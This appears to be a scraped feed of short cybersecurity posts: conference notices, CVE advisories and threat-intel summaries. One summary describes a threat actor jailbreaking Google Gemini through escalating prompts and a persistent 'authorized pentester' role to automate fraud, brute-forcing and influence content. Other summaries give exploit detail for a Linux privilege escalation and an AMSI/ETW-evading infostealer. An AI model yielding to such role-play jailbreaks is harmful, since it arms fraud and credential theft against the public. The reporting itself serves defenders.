CIRCLE WITH A DOT

New event added: @hackfest Hackfest Oct 29-31, 2026 Québec - Montréal - Trois-Rivières - Chicoutimi https://hackfest.ca/en/#infosec #cybersecurity #conference #Canada

New event added: TRISS Oct 22, 2026 Pittsburgh (PA) https://www.threeriversinfosec.com/#infosec #cybersecurity #conference #Triss #USA

BSidesLV & Skytalks CFP: Don't Miss Out! Submit your security talk for our August 3-5 conference. Privacy protected for Skytalks—unique email + pseudonym available. Details: skytalks.info #Security #CyberSecurity #BSidesLV

A new study reveals that AI companies, defense firms, and dating apps are among 38 data collectors using manipulative design to confuse users while collecting their data. https://www.wired.com/story/data-brokers-and-ai-firms-opt-out-forms-are-built-to-fail-report-finds/#Tech #Cybersecurity

Mass Exploitation of Four-Faith Industrial Routers for Botnet ExpansionThreat actors are conducting mass exploitation of a critical hard-coded credential flaw (CVE-2024-9643) in Four-Faith industrial routers to build botnets and gain footholds in corporate networks.**Make sure all your Four-Faith industrial routers are isolated from the internet and only accessible from trusted networks. Then immediately update to the latest firmware to patch CVE-2024-9643, and disable the web management interface on any public-facing ports.**#cybersecurity #infosec #attack #activeexploithttps://beyondmachines.net/event_details/mass-exploitation-of-four-faith-industrial-routers-for-botnet-expansion-v-x-5-k-e/gD2P6Ple2L

(eclecticiq.com) Financially Motivated Threat Actors Exploit AI Coding Assistants in Large-Scale Infostealer CampaignFinancially motivated threat actors are exploiting AI coding assistant hype in a large-scale infostealer campaign targeting developers via SEO poisoning and typosquatted domains impersonating Gemini CLI, Claude Code, and other tools.In brief - eCrime actors use fake AI tool installers to deploy fileless PowerShell infostealers, harvesting credentials, OAuth tokens, and VPN details from enterprise environments. The campaign poses significant supply chain risks, with stolen data enabling initial access to corporate networks.Technically - The attack chain begins with SEO-poisoned search results leading to typosquatted domains (e.g., *-setup.com, *-cli.co.com). Victims execute a PowerShell command (irm | iex) that fetches a fileless second-stage payload, disabling ETW and AMSI for evasion. The malware extracts credentials from Windows Credential Manager, browsers (Chrome, Firefox), collaboration tools (Slack, Teams), and remote access apps (WinSCP, OpenVPN). C2 communications use endpoints like /take and /process, with data exfiltrated via encrypted channels. MITRE ATT&CK techniques include T1189 (Drive-by Compromise), T1059.001 (PowerShell), and T1555.003 (Credentials from Web Browsers).Source: https://blog.eclecticiq.com/seo-poisoning-campaign-leverages-gemini-and-claude-code-impersonation-to-deliver-infostealer#Cybersecurity #ThreatIntel

24 hours of MIRE/C³; the latest stats (Runmode: Neutral 404, delay-only) 3,570 requests from 824 unique IPs Attacker bandwidth cost: 22.2MB Attacker total delay: 4h 29m server time Slowest response: 13.0s #MIREC3 #CyberSecurity #FightingBack

AI agents are scaling faster than enterprise identity controls can keep up with, says Alex Bovee, CEO & Co-Founder of C1. Humans overapprove access Manual IAM workflows cannot scale AI agents require real-time governance“Companies need automated, policy-driven access controls that work in real time.”Full discussion:https://www.technadu.com/ai-scaling-is-outpacing-enterprise-identity-controls-why-companies-need-ai-level-monitoring/628021/#CyberSecurity #IAM #AI #IdentitySecurity #AIAgents

(trendmicro.com) Solo Threat Actor Leverages Jailbroken AI to Automate a 5-Year Influence and Cryptocurrency Fraud Campaign Targeting American AudiencesNew intelligence reveals a solo Russian-speaking threat actor, 'bandcampro,' leveraged a jailbroken Google Gemini model to automate a 5-year influence and cryptocurrency fraud campaign targeting MAGA/QAnon audiences. The AI-driven operation scaled credential theft, content generation, and infrastructure management with minimal resources.In brief - A lone threat actor used jailbroken AI to orchestrate a multi-year cybercrime campaign, exploiting trust in political communities to conduct credential theft and crypto fraud. The operation highlights AI guardrail vulnerabilities and the democratization of sophisticated cybercrime.Technically - The actor bypassed Google Gemini’s ethical safeguards via escalating prompts, establishing a persistent 'authorized pentester' role. The AI generated QAnon-themed content, modeled password mutations for WordPress brute-forcing (CVE-2023-32243 likely exploited), and managed infrastructure via natural-language commands. Stolen Gemini API keys were rotated to evade detection. A repurposed GoToResolve RAT, disguised as a crypto wallet, compromised at least one victim. The campaign also deployed a gamified chatbot ('QFS 2.0 Terminal') to automate audience engagement.Source: https://www.trendmicro.com/en_us/research/26/e/inside-the-influence-and-fraud-patriot-bait-campaign.html#Cybersecurity #ThreatIntel

NVIDIA Patches Critical Authentication Bypass in Triton Inference ServerNVIDIA patched eight vulnerabilities in its Triton Inference Server, including a critical authentication bypass (CVE-2026-24207) that allow unauthenticated remote attackers to execute code, steal data, or disrupt AI model serving operations.**Make sure your NVIDIA Triton Inference Servers are isolated from the internet and accessible only from trusted networks. Then update all Triton Inference Servers to release r26.03 or later ASAP, especially if they are exposed on the internet.**#cybersecurity #infosec #advisory #vulnerabilityhttps://beyondmachines.net/event_details/nvidia-patches-critical-authentication-bypass-in-triton-inference-server-p-g-a-8-j/gD2P6Ple2L

http://ifconfig.me/ http://ifconfig.me/ #bot #cybersecurity #infosec

🟢 Diplomatic Threat | 5/10Iran threatens permit system for internet cables in Strait of HormuzIran announced plans to require permits for internet cables crossing the Strait of Hormuz, potentially impacting global digital infrastructure.#OSINT #NewsGroup #Iran #StraitOfHormuz #CyberSecurity

(picussecurity.com) Fragnesia (CVE-2026-46300): A Deep Dive into the Linux Kernel LPE Vulnerability in XFRM ESP-in-TCP SubsystemNew high-severity Linux kernel LPE vulnerability (CVE-2026-46300, CVSS 7.8) dubbed Fragnesia enables unprivileged local attackers to gain root access by exploiting flawed memory coalescing in the XFRM ESP-in-TCP subsystem.In brief - Fragnesia allows attackers to overwrite read-only executable files in memory (e.g., setuid-root binaries) via page cache manipulation, leading to reliable root shell access without modifying on-disk files. Affects nearly all Linux distributions; patch or disable vulnerable modules immediately.Technically - The flaw stems from the kernel's failure to recognize shared fragment pages during skb coalescing in the XFRM ESP-in-TCP subsystem. Attackers exploit this by installing a transport-mode ESP-in-TCP SA with AES-128-GCM, then using splice-and-ULP to enqueue data in the TCP buffer. By controlling the IV nonce, they select keystream bytes to XOR with target file page cache entries, enabling precise modifications. The exploit writes a 192-byte ELF stub into the page cache of a setuid-root binary (e.g., /usr/bin/su), differing from Dirty Frag by targeting memory coalescing logic rather than IPsec ESP/RxRPC.Source: https://www.picussecurity.com/resource/blog/fragnesia-cve-2026-46300-linux-kernel-lpe-vulnerability-explained#Cybersecurity #ThreatIntel

New ThreatNoir Cyber News short: The Key Under The Mat.Bitlocker bypass via USB file + reboot. 27 seconds, no fluff.Source breakdown: https://threatnoir.com#infosec #bitlocker #cybersecurity

(kudelskisecurity.com) Highly Critical SQL Injection Vulnerability in Drupal Core Affecting PostgreSQL Backends (CVE-2026-9082)New highly critical unauthenticated SQLi in Drupal Core (CVE-2026-9082) enables RCE on PostgreSQL backends. Immediate patching required.In brief - CVE-2026-9082 is a highly critical unauthenticated SQL injection flaw in Drupal Core affecting PostgreSQL backends. Attackers can execute arbitrary SQL, escalate privileges, or achieve RCE without authentication. Drupal rates this 19/25 and urges immediate patching.Technically - CVE-2026-9082 stems from improper input validation in Drupal’s core API when interacting with PostgreSQL. Attackers can manipulate SQL queries via crafted requests, leading to data exposure, credential theft, or RCE. Exploitation requires no authentication, has low complexity, and affects core functionality. Patches are available for all supported versions.Source: https://kudelskisecurity.com/research/critical-drupal-core-sql-injection-vulnerability#Cybersecurity #ThreatIntel

SFOP: Neuer Code-Reuse-Angriff hebelt Intel CET unter Linux ausDer Angriff basiert auf 12 bislang unbekannten Schwachstellen in der Linux-Signalbehandlung und funktioniert ohne besondere Voraussetzungen im Zielprogramm – er wirkt damit auf jedem Linux-System, unabhängig von der eingesetzten Software.https://www.all-about-security.de/sfop-neuer-code-reuse-angriff-hebelt-intel-cet-unter-linux-aus/#linux #cybersecurity

@thenewoil "mSzyfr" - I assume that's easier to say if you're Polish than English Nothing classified should ever be sent via public apps."The recommendation, signed by Deputy Prime Minister and Minister of Digital Affairs Krzysztof Gawkowski, specifically advises entities within Poland’s National Cybersecurity System (KSC) to use trusted government-managed communication platforms instead of commercial messaging applications for sensitive work."Recommendation?? it should be Mandatory.

New ransom group blog post!Group name: qilinPost title: CJ ArchitectsInfo: https://cti.fyi/groups/qilin.html#ransomware #cti #threatintelligence #cybersecurity #infosec

(safedep.io) Compromised art-template npm Package Delivers Coruna iOS Exploit Kit via Supply Chain AttackCritical supply-chain compromise detected in the npm package art-template (4.13.3–4.13.6), delivering the Coruna iOS exploit kit via account takeover. The attack targets iPhone users with a multi-stage payload exploiting CVE-2024-23222 (CVSS 8.8) and 22 other vulnerabilities, leading to native code execution and cryptocurrency wallet theft via PLASMAGRID.In brief - A maintainer account takeover enabled malicious versions of the widely used art-template npm package to inject browser-based payloads. The attack chain delivers the Coruna exploit kit, exploiting iOS vulnerabilities (including CVE-2024-23222) to deploy PLASMAGRID, a cryptocurrency wallet stealer. Active C2 infrastructure and throwaway npm accounts highlight persistent supply chain risks.Technically - Unauthorized modifications to template-web.js in art-template versions 4.13.3–4.13.6 appended code loading external scripts from v3.jiathis[.]com. The attack stages include Baidu Analytics tracking, iPhone-specific iframes, device fingerprinting, and delivery of the Coruna exploit kit (606KB, 14 modules). CVE-2024-23222 (JavaScriptCore type confusion) is exploited via WebAssembly type confusion and JIT heap spraying, bypassing ASLR through dyld shared cache parsing. ARM64 shellcode executes syscalls (ptrace, csops) for native code execution. PLASMAGRID targets wallets like MetaMask, with C2 (l1ewsu3yjkqeroy[.]xyz) fronted by Cloudflare. Throwaway npm accounts (v4v5qc, npmpacketmaintainmember7) and GitHub renames (aui → goofychris) maintained persistence.Source: https://safedep.io/art-template-npm-supply-chain-compromise#Cybersecurity #ThreatIntel

(nattothoughts.com) Insecure-by-Design: How Meari Technology's IoT Infrastructure Exposes Global Surveillance Risks and AI Training AmbitionsMeari Technology’s IoT infrastructure exposes over 1M devices (baby monitors, security cameras) across 118 countries due to systemic architectural flaws enabling unauthorized vendor/third-party access to live/stored feeds. No security boundary exists between backend and user devices.In brief - A Chinese ODM’s insecure-by-design IoT platform risks global surveillance exposure, with delayed remediation and potential AI training data exploitation. Disclosure process revealed hostile vendor response and partial fixes.Technically - Flaws include unauthenticated MQTT brokers, hardcoded credentials, misconfigured P2P relays, and unsecured alert image storage. Researcher documented 12 evidence points confirming vendor access. RunZero disclosed 5 high-risk CVEs post-contentious 2-month CVD process. Systemic design choices, not bugs, enable persistent access.Source: https://www.nattothoughts.com/p/is-this-chinese-company-watching#Cybersecurity #ThreatIntel